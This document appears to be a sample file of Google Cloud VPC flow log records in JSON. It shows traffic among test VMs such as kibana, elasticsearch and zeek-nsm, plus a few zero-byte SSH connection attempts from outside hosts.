-{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"203.0.113.134","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"203.0.113.134","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"203.0.113.134","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"198.51.100.88","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"203.0.113.228","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"203.0.113.134","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"203.0.113.134","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"203.0.113.134","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 